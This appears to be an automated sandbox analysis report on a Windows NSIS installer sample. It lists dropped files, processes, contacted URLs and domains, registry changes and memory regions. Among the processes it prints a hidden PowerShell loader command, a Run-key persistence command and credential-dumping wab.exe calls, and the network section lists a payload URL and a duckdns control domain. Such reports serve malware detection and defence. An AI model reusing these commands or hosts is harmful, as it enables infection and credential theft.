Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out
|
ASCII text, with very long lines (61481), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\mqerms.dat
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json
|
JSON data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arcxwotz.clw.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oech0po2.o0f.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\bhvED54.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x0155ffb7, page size 32768, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fattighjlps\Assistentuddannelsen7\anfrsels.dra
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fattighjlps\Assistentuddannelsen7\backhatch.amf
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Fingerstall\Todagesmdet\statshusmands\Genopfrisknings\cadger.bol
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen\tracheloscapular.une
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Nonhomiletic\Svelningen\waterish.tat
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Preenlarged\confederater.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Preenlarged\hillwort.spu
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Preenlarged\navlebeskuelsernes.kmp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Sammenrends.Sla
|
data
|
dropped
|
||
|
C:\Windows\Fonts\tashlik.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Resources\0809\marmoreret.ini
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 10 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe
|
"C:\Users\user\Desktop\#U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Forstbotanikkens=Get-Content 'C:\Users\user\AppData\Local\nervier\Estampede\sipunculacean\Entreprenren.Out';$Vaabentypers=$Forstbotanikkens.SubString(61389,3);.$Vaabentypers($Forstbotanikkens)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ
/d "%Linieringernes% -windowstyle minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes%
($Localisers)"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\frrlxvvcyajmkjprpxzqdq"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\itedxngwlibzmqlvhhlsguxrsq"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
|
|
|
|
C:\Program Files (x86)\Windows Mail\wab.exe
|
"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\snjwygrxzqtexwzhqsglqhsitfuae"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "mediates" /t REG_EXPAND_SZ /d "%Linieringernes% -windowstyle
minimized $Localisers=(Get-ItemProperty -Path 'HKCU:\Officialvirksomhed\').pshaws;%Linieringernes% ($Localisers)"
|
There are 3 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://geoplugin.net/json.gp
|
178.237.33.50
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://geoplugin.net/json.gph
|
unknown
|
||
|
http://www.imvu.comr
|
unknown
|
||
|
http://geoplugin.net/json.gpe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://geoplugin.net/json.gpo
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://ricohltd.top/;
|
unknown
|
||
|
http://www.imvu.com
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.imvu.coma
|
unknown
|
||
|
http://www.nirsoft.net
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
|
unknown
|
||
|
https://ricohltd.top/
|
unknown
|
||
|
https://ricohltd.top/aCqwFQDQz144.bin5
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://ricohltd.top/aCqwFQDQz144.bin
|
104.21.60.38
|
||
|
http://geoplugin.net/json.gpL
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
http://geoplugin.net/1
|
unknown
|
||
|
http://geoplugin.net/json.gpal
|
unknown
|
||
|
https://www.google.com/accounts/servicelogin
|
unknown
|
||
|
https://login.yahoo.com/config/login
|
unknown
|
||
|
http://geoplugin.net/json.gpU
|
unknown
|
||
|
http://www.nirsoft.net/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://www.ebuddy.com
|
unknown
|
There are 23 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
learfo55ozj01.duckdns.org
|
193.222.96.21
|
|
|
|
geoplugin.net
|
178.237.33.50
|
||
|
ricohltd.top
|
104.21.60.38
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
193.222.96.21
|
learfo55ozj01.duckdns.org
|
Germany
|
|
|
|
104.21.60.38
|
ricohltd.top
|
United States
|
||
|
178.237.33.50
|
geoplugin.net
|
Netherlands
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Superintendenters
|
unsucculent
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\indentor\pintas
|
Byggrynets
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Spge
|
skyggeboksnings
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Stenhuggeriers14
|
concupiscence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\elvar
|
presenceless
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Litherly
|
enkemandspension
|
||
|
HKEY_CURRENT_USER\SOFTWARE\dekanesserne\stragglingly
|
kennelklub
|
||
|
HKEY_CURRENT_USER\Officialvirksomhed
|
pshaws
|
||
|
HKEY_CURRENT_USER\Environment
|
Linieringernes
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
exepath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
licence
|
||
|
HKEY_CURRENT_USER\SOFTWARE\alpwovnb-G3F5OR
|
time
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
mediates
|
There are 3 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
93F7000
|
direct allocation
|
page execute and read and write
|
|
|
|
4A2E000
|
heap
|
page read and write
|
||
|
20E8B000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
8720000
|
trusted library allocation
|
page read and write
|
||
|
898C000
|
stack
|
page read and write
|
||
|
42F000
|
unkown
|
page read and write
|
||
|
6238000
|
trusted library allocation
|
page read and write
|
||
|
52AE000
|
heap
|
page read and write
|
||
|
707000
|
heap
|
page read and write
|
||
|
7310000
|
direct allocation
|
page read and write
|
||
|
4EBD000
|
heap
|
page read and write
|
||
|
203BE000
|
stack
|
page read and write
|
||
|
4A76000
|
heap
|
page read and write
|
||
|
2DEE000
|
stack
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
2F50000
|
heap
|
page read and write
|
||
|
4D60000
|
direct allocation
|
page read and write
|
||
|
4A24000
|
heap
|
page read and write
|
||
|
762E000
|
stack
|
page read and write
|
||
|
4CF0000
|
direct allocation
|
page read and write
|
||
|
A2F000
|
unkown
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
7380000
|
direct allocation
|
page read and write
|
||
|
670000
|
heap
|
page read and write
|
||
|
4EFC000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
20E59000
|
heap
|
page read and write
|
||
|
637C000
|
trusted library allocation
|
page read and write
|
||
|
3560000
|
heap
|
page read and write
|
||
|
20D1C000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
72B000
|
heap
|
page read and write
|
||
|
779A000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
4E1F000
|
stack
|
page read and write
|
||
|
4ECB000
|
heap
|
page read and write
|
||
|
534D000
|
heap
|
page read and write
|
||
|
800000
|
heap
|
page read and write
|
||
|
209EB000
|
unclassified section
|
page execute and read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
21230000
|
unclassified section
|
page execute and read and write
|
||
|
3200000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
90E000
|
stack
|
page read and write
|
||
|
59C8000
|
trusted library allocation
|
page read and write
|
||
|
20AA0000
|
heap
|
page read and write
|
||
|
51C9000
|
heap
|
page read and write
|
||
|
20480000
|
direct allocation
|
page read and write
|
||
|
89A8000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4AF0000
|
trusted library allocation
|
page read and write
|
||
|
C60000
|
heap
|
page readonly
|
||
|
4A75000
|
heap
|
page read and write
|
||
|
4A27000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4D70000
|
direct allocation
|
page read and write
|
||
|
4E32000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
32B2000
|
heap
|
page read and write
|
||
|
7960000
|
trusted library allocation
|
page read and write
|
||
|
323D000
|
trusted library allocation
|
page execute and read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4A52000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
3150000
|
heap
|
page read and write
|
||
|
26E0000
|
heap
|
page read and write
|
||
|
435000
|
unkown
|
page read and write
|
||
|
4C5D000
|
stack
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
5140000
|
heap
|
page execute and read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page read and write
|
||
|
4A35000
|
heap
|
page read and write
|
||
|
2085C000
|
stack
|
page read and write
|
||
|
4CB0000
|
direct allocation
|
page read and write
|
||
|
4DF8000
|
heap
|
page read and write
|
||
|
7B90000
|
trusted library allocation
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4ECD000
|
heap
|
page read and write
|
||
|
325E000
|
stack
|
page read and write
|
||
|
4A25000
|
heap
|
page read and write
|
||
|
4A5A000
|
heap
|
page read and write
|
||
|
31FE000
|
stack
|
page read and write
|
||
|
7300000
|
direct allocation
|
page read and write
|
||
|
2079F000
|
stack
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
351F000
|
stack
|
page read and write
|
||
|
79D0000
|
trusted library allocation
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
7B10000
|
trusted library allocation
|
page read and write
|
||
|
4A50000
|
heap
|
page read and write
|
||
|
4A29000
|
heap
|
page read and write
|
||
|
735000
|
heap
|
page read and write
|
||
|
4D00000
|
direct allocation
|
page read and write
|
||
|
3240000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A2A000
|
heap
|
page read and write
|
||
|
2120D000
|
unclassified section
|
page execute and read and write
|
||
|
21223000
|
unclassified section
|
page execute and read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
4E1E000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
4A58000
|
heap
|
page read and write
|
||
|
3248000
|
heap
|
page read and write
|
||
|
8BE0000
|
direct allocation
|
page execute and read and write
|
||
|
747000
|
heap
|
page read and write
|
||
|
714000
|
heap
|
page read and write
|
||
|
7980000
|
trusted library allocation
|
page read and write
|
||
|
20460000
|
direct allocation
|
page read and write
|
||
|
347F000
|
stack
|
page read and write
|
||
|
4B00000
|
trusted library allocation
|
page read and write
|
||
|
630000
|
heap
|
page read and write
|
||
|
8730000
|
trusted library allocation
|
page read and write
|
||
|
209D0000
|
unclassified section
|
page execute and read and write
|
||
|
4017000
|
remote allocation
|
page execute and read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
20C2A000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
3288000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
8CD000
|
stack
|
page read and write
|
||
|
21286000
|
unclassified section
|
page execute and read and write
|
||
|
747D000
|
stack
|
page read and write
|
||
|
7390000
|
direct allocation
|
page read and write
|
||
|
454000
|
unkown
|
page read and write
|
||
|
4A17000
|
remote allocation
|
page execute and read and write
|
||
|
329E000
|
heap
|
page read and write
|
||
|
4AE9000
|
trusted library allocation
|
page read and write
|
||
|
8CF000
|
stack
|
page read and write
|
||
|
5350000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
4DF0000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
22AE000
|
stack
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
9CB000
|
stack
|
page read and write
|
||
|
2F26000
|
heap
|
page read and write
|
||
|
3060000
|
heap
|
page read and write
|
||
|
4C70000
|
direct allocation
|
page read and write
|
||
|
52AA000
|
heap
|
page read and write
|
||
|
7B80000
|
trusted library allocation
|
page read and write
|
||
|
4C70000
|
trusted library allocation
|
page read and write
|
||
|
72F000
|
heap
|
page read and write
|
||
|
4E78000
|
heap
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
4A4F000
|
heap
|
page read and write
|
||
|
674000
|
heap
|
page read and write
|
||
|
2051F000
|
stack
|
page read and write
|
||
|
20680000
|
heap
|
page read and write
|
||
|
526F000
|
stack
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
7737000
|
trusted library allocation
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
4A52000
|
heap
|
page read and write
|
||
|
4A20000
|
heap
|
page read and write
|
||
|
88BC000
|
stack
|
page read and write
|
||
|
20E29000
|
heap
|
page read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
730000
|
heap
|
page read and write
|
||
|
4BB0000
|
heap
|
page readonly
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
20470000
|
direct allocation
|
page read and write
|
||
|
2B0F000
|
stack
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
31BD000
|
stack
|
page read and write
|
||
|
4A4F000
|
heap
|
page read and write
|
||
|
357D000
|
heap
|
page read and write
|
||
|
20E59000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
4CD0000
|
direct allocation
|
page read and write
|
||
|
2355000
|
heap
|
page read and write
|
||
|
7990000
|
trusted library allocation
|
page read and write
|
||
|
4E28000
|
heap
|
page read and write
|
||
|
7370000
|
heap
|
page execute and read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
2D9C000
|
stack
|
page read and write
|
||
|
20AA1000
|
heap
|
page read and write
|
||
|
4D30000
|
direct allocation
|
page read and write
|
||
|
40D000
|
unkown
|
page read and write
|
||
|
8BF0000
|
trusted library allocation
|
page read and write
|
||
|
2075E000
|
stack
|
page read and write
|
||
|
4A22000
|
heap
|
page read and write
|
||
|
4A64000
|
heap
|
page read and write
|
||
|
49F0000
|
heap
|
page read and write
|
||
|
72A0000
|
direct allocation
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
5290000
|
heap
|
page read and write
|
||
|
743000
|
heap
|
page read and write
|
||
|
4D20000
|
direct allocation
|
page read and write
|
||
|
4A35000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4C25000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
20E59000
|
heap
|
page read and write
|
||
|
4A33000
|
heap
|
page read and write
|
||
|
600000
|
heap
|
page read and write
|
||
|
327A000
|
heap
|
page read and write
|
||
|
208DD000
|
stack
|
page read and write
|
||
|
707000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
780D000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
2CFC000
|
stack
|
page read and write
|
||
|
4A29000
|
heap
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
7320000
|
direct allocation
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
2067F000
|
stack
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
85B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
31BB000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
530000
|
heap
|
page read and write
|
||
|
4A24000
|
heap
|
page read and write
|
||
|
72F0000
|
direct allocation
|
page read and write
|
||
|
C3E000
|
unkown
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
20E42000
|
heap
|
page read and write
|
||
|
6EB000
|
heap
|
page read and write
|
||
|
20DB1000
|
heap
|
page read and write
|
||
|
204DE000
|
stack
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
77E000
|
unkown
|
page read and write
|
||
|
4C90000
|
direct allocation
|
page read and write
|
||
|
20B91000
|
heap
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
70B000
|
heap
|
page read and write
|
||
|
324E000
|
stack
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4A77000
|
heap
|
page read and write
|
||
|
4A19000
|
heap
|
page read and write
|
||
|
7B00000
|
trusted library allocation
|
page read and write
|
||
|
212A0000
|
heap
|
page read and write
|
||
|
5261000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
9BE000
|
stack
|
page read and write
|
||
|
522E000
|
stack
|
page read and write
|
||
|
9AC000
|
stack
|
page read and write
|
||
|
4CD000
|
stack
|
page read and write
|
||
|
463000
|
unkown
|
page readonly
|
||
|
4ED0000
|
heap
|
page read and write
|
||
|
4A33000
|
heap
|
page read and write
|
||
|
729B000
|
stack
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A10000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4CA0000
|
direct allocation
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
7ADD000
|
stack
|
page read and write
|
||
|
31FC000
|
heap
|
page read and write
|
||
|
4A26000
|
heap
|
page read and write
|
||
|
C50000
|
heap
|
page read and write
|
||
|
20BB0000
|
heap
|
page read and write
|
||
|
3233000
|
trusted library allocation
|
page execute and read and write
|
||
|
548E000
|
heap
|
page read and write
|
||
|
4A24000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
7C0B000
|
stack
|
page read and write
|
||
|
4B02000
|
trusted library allocation
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
20600000
|
remote allocation
|
page read and write
|
||
|
4D40000
|
direct allocation
|
page read and write
|
||
|
7A9E000
|
stack
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
4EBD000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
715000
|
heap
|
page read and write
|
||
|
4A23000
|
heap
|
page read and write
|
||
|
460000
|
unkown
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
C70000
|
heap
|
page read and write
|
||
|
9DF7000
|
direct allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4A44000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
7970000
|
trusted library allocation
|
page read and write
|
||
|
2E1D000
|
stack
|
page read and write
|
||
|
3170000
|
heap
|
page read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
317E000
|
stack
|
page read and write
|
||
|
3563000
|
heap
|
page read and write
|
||
|
4E7C000
|
heap
|
page read and write
|
||
|
20600000
|
remote allocation
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
400000
|
system
|
page execute and read and write
|
||
|
3039000
|
stack
|
page read and write
|
||
|
326E000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
2EA4000
|
heap
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
9350000
|
direct allocation
|
page execute and read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
548B000
|
heap
|
page read and write
|
||
|
314F000
|
stack
|
page read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
4A27000
|
heap
|
page read and write
|
||
|
30D0000
|
heap
|
page read and write
|
||
|
4C66000
|
heap
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
7B40000
|
trusted library allocation
|
page read and write
|
||
|
473000
|
system
|
page execute and read and write
|
||
|
20E42000
|
heap
|
page read and write
|
||
|
5231000
|
trusted library allocation
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
2EA5000
|
heap
|
page read and write
|
||
|
8BC0000
|
heap
|
page read and write
|
||
|
4A25000
|
heap
|
page read and write
|
||
|
6BE000
|
stack
|
page read and write
|
||
|
4A24000
|
heap
|
page read and write
|
||
|
4B05000
|
trusted library allocation
|
page execute and read and write
|
||
|
31E8000
|
heap
|
page read and write
|
||
|
518F000
|
stack
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
4EF1000
|
heap
|
page read and write
|
||
|
86E5000
|
trusted library allocation
|
page read and write
|
||
|
7EFF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BF0000
|
heap
|
page read and write
|
||
|
4A46000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
7350000
|
direct allocation
|
page read and write
|
||
|
56C6000
|
heap
|
page read and write
|
||
|
7BE000
|
stack
|
page read and write
|
||
|
431000
|
unkown
|
page read and write
|
||
|
705000
|
heap
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
7630000
|
heap
|
page read and write
|
||
|
56B3000
|
heap
|
page read and write
|
||
|
4D0000
|
heap
|
page read and write
|
||
|
2DDC000
|
stack
|
page read and write
|
||
|
2DAD000
|
stack
|
page read and write
|
||
|
7796000
|
heap
|
page read and write
|
||
|
2DFE000
|
stack
|
page read and write
|
||
|
4A29000
|
heap
|
page read and write
|
||
|
26E8000
|
heap
|
page read and write
|
||
|
3050000
|
heap
|
page readonly
|
||
|
2099E000
|
stack
|
page read and write
|
||
|
4E86000
|
heap
|
page read and write
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A11000
|
heap
|
page read and write
|
||
|
784C000
|
heap
|
page read and write
|
||
|
4E86000
|
heap
|
page read and write
|
||
|
3180000
|
heap
|
page readonly
|
||
|
5BE000
|
stack
|
page read and write
|
||
|
5260000
|
heap
|
page read and write
|
||
|
4A2D000
|
heap
|
page read and write
|
||
|
20490000
|
direct allocation
|
page read and write
|
||
|
3110000
|
heap
|
page read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
4A39000
|
heap
|
page read and write
|
||
|
4A16000
|
heap
|
page read and write
|
||
|
3CD000
|
stack
|
page read and write
|
||
|
33DF000
|
stack
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
9FF000
|
stack
|
page read and write
|
||
|
4C50000
|
heap
|
page readonly
|
||
|
4D10000
|
direct allocation
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
2F2E000
|
heap
|
page read and write
|
||
|
7730000
|
trusted library allocation
|
page read and write
|
||
|
341E000
|
stack
|
page read and write
|
||
|
505F000
|
stack
|
page read and write
|
||
|
20CA2000
|
heap
|
page read and write
|
||
|
20E39000
|
heap
|
page read and write
|
||
|
741000
|
heap
|
page read and write
|
||
|
50D000
|
stack
|
page read and write
|
||
|
4A2E000
|
heap
|
page read and write
|
||
|
315A000
|
heap
|
page read and write
|
||
|
5290000
|
trusted library allocation
|
page read and write
|
||
|
4CC0000
|
direct allocation
|
page read and write
|
||
|
4A1C000
|
heap
|
page read and write
|
||
|
7340000
|
direct allocation
|
page read and write
|
||
|
7330000
|
direct allocation
|
page read and write
|
||
|
2BE0000
|
heap
|
page read and write
|
||
|
710000
|
heap
|
page read and write
|
||
|
7375000
|
heap
|
page execute and read and write
|
||
|
3176000
|
heap
|
page read and write
|
||
|
4ECC000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
61D1000
|
trusted library allocation
|
page read and write
|
||
|
4E6E000
|
heap
|
page read and write
|
||
|
8710000
|
trusted library allocation
|
page read and write
|
||
|
4BAE000
|
stack
|
page read and write
|
||
|
4A21000
|
heap
|
page read and write
|
||
|
4A31000
|
heap
|
page read and write
|
||
|
3160000
|
trusted library section
|
page read and write
|
||
|
34AF000
|
stack
|
page read and write
|
||
|
31F4000
|
heap
|
page read and write
|
||
|
4A29000
|
heap
|
page read and write
|
||
|
743000
|
heap
|
page read and write
|
||
|
4A18000
|
heap
|
page read and write
|
||
|
